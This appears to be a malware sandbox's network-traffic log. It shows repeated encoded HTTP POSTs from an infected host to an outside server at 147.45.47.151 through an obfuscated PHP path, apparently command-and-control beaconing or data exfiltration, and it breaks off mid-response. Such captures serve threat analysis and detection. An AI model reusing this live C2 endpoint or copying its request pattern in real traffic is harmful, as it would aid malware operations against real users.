                                                                                          Dec 10, 2024 07:29:48.358995914 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:48.710134029 CET | 2512 | OUT |
                                                                                          Dec 10, 2024 07:29:49.557241917 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:49.792318106 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:49 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                          65 | 192.168.2.8 | 49889 | 147.45.47.151 | 80
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:29:48.536530018 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2004
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:48.882076979 CET | 2004 | OUT | Data Raw: 52 5e 5a 58 5e 5d 55 51 58 57 5a 57 52 52 51 5d 5b 5b 5d 46 57 5e 50 58 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R^ZX^]UQXWZWRRQ][[]FW^PX^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!&79"P"&>=>3Y+$\ 62(;<++9[ 7]..\%!Z+
                                                                                          Dec 10, 2024 07:29:49.797220945 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:50.032656908 CET | 349 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:49 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 39 38 0d 0a 01 11 26 07 37 2a 2f 1f 32 0d 3b 0a 2f 1f 09 1c 31 13 2f 40 3e 22 3a 14 31 3b 2b 19 2e 21 34 09 2a 03 31 10 28 5c 2b 0d 3e 11 27 56 24 0f 21 46 0c 1d 24 5d 24 02 32 5d 27 13 0a 04 24 59 23 12 27 21 23 15 29 0d 23 0a 20 23 0d 5e 33 0a 2b 0d 3b 5b 2e 57 2c 43 25 1b 3d 32 35 0d 26 28 22 57 0d 12 27 52 26 30 35 58 22 21 3a 1e 22 1f 06 1e 3c 25 20 58 27 2e 34 00 23 3a 13 13 33 0f 0e 5b 20 51 20 11 3c 3b 00 10 25 04 31 09 33 01 20 5e 2a 0e 2b 55 04 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98&7*/2;/1/@>":1;+.!4*1(\+>'V$!F$]$2]'$Y#'!#)# #^3+;[.W,C%=25&("W'R&05X"!:"<% X'.4#:3[ Q <;%13 ^*+U?WT0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                          66 | 192.168.2.8 | 49891 | 147.45.47.151 | 80
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:29:50.071717024 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2504
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:50.429152012 CET | 2504 | OUT | Data Raw: 57 58 5a 59 5e 5b 55 5f 58 57 5a 57 52 55 51 57 5b 5d 5d 42 57 50 50 5b 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: WXZY^[U_XWZWRUQW[]]BWPP[^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"Z1(49"=>,$ ': R!9+;$P=;:#17[.).\%!Z+(
                                                                                          Dec 10, 2024 07:29:51.339764118 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:51.572602987 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:51 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                          67 | 192.168.2.8 | 49897 | 147.45.47.151 | 80
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:29:51.834342003 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:52.181715012 CET | 2512 | OUT | Data Raw: 57 59 5a 5a 5b 5e 55 59 58 57 5a 57 52 5d 51 5c 5b 5d 5d 49 57 50 50 5c 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: WYZZ[^UYXWZWR]Q\[]]IWPP\^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"&<,!:P6^>/$<4%*(5>X<0Q)+& +[-).\%!Z+
                                                                                          Dec 10, 2024 07:29:53.095438004 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:53.328442097 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:52 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                          68 | 192.168.2.8 | 49903 | 147.45.47.151 | 80
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:29:53.606560946 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:53.960288048 CET | 2512 | OUT | Data Raw: 57 51 5f 58 5b 5b 50 5b 58 57 5a 57 52 57 51 50 5b 59 5d 41 57 54 50 55 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: WQ_X[[P[XWZWRWQP[Y]AWTPU^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"%+7:65"*>70?#$\?!?8')642+[:).\%!Z+,
                                                                                          Dec 10, 2024 07:29:54.867449045 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:55.100514889 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:54 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                          69 | 192.168.2.8 | 49908 | 147.45.47.151 | 80
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:29:55.158580065 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 1992
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:55.515443087 CET | 1992 | OUT | Data Raw: 57 5b 5a 5a 5b 5c 55 5d 58 57 5a 57 52 55 51 53 5b 5d 5d 41 57 5e 50 5b 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W[ZZ[\U]XWZWRUQS[]]AW^P[^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"2,? 96#%5_*.'Y#$ V5%)(V*9#"\..\%!Z+
                                                                                          Dec 10, 2024 07:29:56.419462919 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:56.657130957 CET | 349 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:56 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 39 38 0d 0a 01 11 26 01 37 29 27 58 32 1d 33 0c 2c 32 2f 1c 25 13 3f 41 3e 22 32 16 32 01 37 16 3a 0c 3f 54 3d 03 39 13 28 04 2c 11 2a 3f 2f 53 33 35 21 46 0c 1d 24 15 27 3b 21 07 24 13 2b 5c 30 01 0a 00 30 0b 24 01 2a 0d 2b 0c 23 0a 33 5c 33 33 23 08 2c 2e 3a 56 2c 0b 21 1b 29 0c 0c 54 25 02 22 57 0d 12 24 08 24 23 3a 06 22 22 2e 54 36 22 34 1f 29 35 2c 58 33 58 2b 10 35 03 2a 03 24 21 01 01 23 27 0e 11 28 28 2d 05 24 3d 3d 0f 24 2b 20 5e 2a 0e 2b 55 04 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98&7)'X23,2/%?A>"227:?T=9(,*?/S35!F$';!$+\00$*+#3\33#,.:V,!)T%"W$$#:"".T6"4)5,X3X+5*$!#'((-$==$+ ^*+U?WT0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                          70 | 192.168.2.8 | 49909 | 147.45.47.151 | 80
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:29:55.360614061 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:55.710169077 CET | 2512 | OUT | Data Raw: 57 50 5a 5d 5e 5a 55 5a 58 57 5a 57 52 53 51 57 5b 5d 5d 47 57 56 50 5d 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: WPZ]^ZUZXWZWRSQW[]]GWVP]^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!%0] 9!5(>#0,7'!=%](;<)+4! 9.\%!Z+<
                                                                                          Dec 10, 2024 07:29:56.624278069 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:56.856590033 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:56 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                          71 | 192.168.2.8 | 49915 | 147.45.47.151 | 80
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:29:57.093425035 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:57.444430113 CET | 2512 | OUT | Data Raw: 52 5b 5a 59 5e 59 55 5f 58 57 5a 57 52 52 51 52 5b 5d 5d 41 57 51 50 58 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R[ZY^YU_XWZWRRQR[]]AWQPX^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!1,\49="==+Z$0^0)7".( )%X71']/9.\%!Z+
                                                                                          Dec 10, 2024 07:29:58.355387926 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:58.588583946 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:58 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                          72 | 192.168.2.8 | 49917 | 147.45.47.151 | 80
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:29:58.845568895 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2504
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:59.194462061 CET | 2504 | OUT | Data Raw: 57 5e 5a 5e 5e 5b 55 5b 58 57 5a 57 52 55 51 5d 5b 5b 5d 45 57 56 50 5e 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W^Z^^[U[XWZWRUQ][[]EWVP^^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"_'//796V61Y(=+]3< ':U52(;#)+:!"'9.\%!Z+
                                                                                          Dec 10, 2024 07:30:00.107903957 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:30:00.340565920 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:59 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                          73 | 192.168.2.8 | 49923 | 147.45.47.151 | 80
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:30:00.577135086 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:30:00.929562092 CET | 2512 | OUT | Data Raw: 57 5a 5f 5b 5b 5b 55 59 58 57 5a 57 52 50 51 55 5b 51 5d 42 57 53 50 5d 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: WZ_[[[UYXWZWRPQU[Q]BWSP]^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!2?,#)9!&)Z)-4''3+".*<8 W=8%_7;Z99.\%!Z+0
                                                                                          Dec 10, 2024 07:30:01.838671923 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:30:02.072525978 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:30:01 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                          74 | 192.168.2.8 | 49928 | 147.45.47.151 | 80
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:30:01.784426928 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2004
                                                                                          Expect: 100-continue
Dec 10, 2024 07:30:02.132056952 CET | 2004 | OUT | Data Raw: 57 5b 5f 59 5b 59 55 5b 58 57 5a 57 52 56 51 57 5b 5d 5d 48 57 55 50 5b 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W[_Y[YU[XWZWRVQW[]]HWUP[^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"2/?7&W569)>7]$,735.\+(0P*1X!23Y-.\%!Z+(
Dec 10, 2024 07:30:03.054285049 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 10, 2024 07:30:03.280560017 CET | 349 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:30:02 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 39 38 0d 0a 01 11 25 5e 37 39 33 10 31 0a 24 10 2f 1f 33 13 32 03 27 41 2b 22 26 14 32 28 38 06 39 22 27 50 2a 2d 39 10 29 2a 2c 54 3f 2f 27 57 25 35 21 46 0c 1d 27 00 27 28 32 14 27 03 20 00 30 59 3c 07 26 31 27 15 2b 33 01 0b 23 20 2f 5c 26 33 28 55 2f 3e 35 0f 3b 1b 3d 1c 3e 32 0b 0c 27 28 22 57 0d 12 27 52 24 20 22 02 34 0c 36 54 23 31 3c 55 29 36 30 5d 24 3e 05 1f 35 14 31 59 30 08 37 07 20 19 28 13 28 3b 0c 5c 32 3d 25 0f 24 11 20 5e 2a 0e 2b 55 04 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98%^7931$/32'A+"&2(89"'P*-9)*,T?/'W%5!F''(2' 0Y<&1'+3# /\&3(U/>5;=>2'("W'R$ "46T#1<U)60]$>51Y07 ((;\2=%$ ^*+U?WT0


Session ID | Source IP | Source Port | Destination IP | Destination Port
75 | 192.168.2.8 | 49930 | 147.45.47.151 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:30:02.312946081 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
Dec 10, 2024 07:30:02.695750952 CET | 2512 | OUT | Data Raw: 57 5b 5f 5b 5e 5d 55 59 58 57 5a 57 52 51 51 56 5b 58 5d 46 57 55 50 5f 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W[_[^]UYXWZWRQQV[X]FWUP_^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"%Y,]7%6%[>>3 '0U"9[(#*89!1'Z9.\%!Z+4
Dec 10, 2024 07:30:03.575222015 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 10, 2024 07:30:03.808585882 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:30:03 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
76 | 192.168.2.8 | 49935 | 147.45.47.151 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:30:04.050729036 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
Dec 10, 2024 07:30:04.399494886 CET | 2512 | OUT | Data Raw: 57 51 5f 5a 5e 5a 50 5d 58 57 5a 57 52 5c 51 57 5b 5c 5d 44 57 52 50 5b 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: WQ_Z^ZP]XWZWR\QW[\]DWRP[^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!%/#\%!)>3Z$Y4\'W5..)8Q=;&4"0/9.\%!Z+
Dec 10, 2024 07:30:05.311827898 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 10, 2024 07:30:05.544393063 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
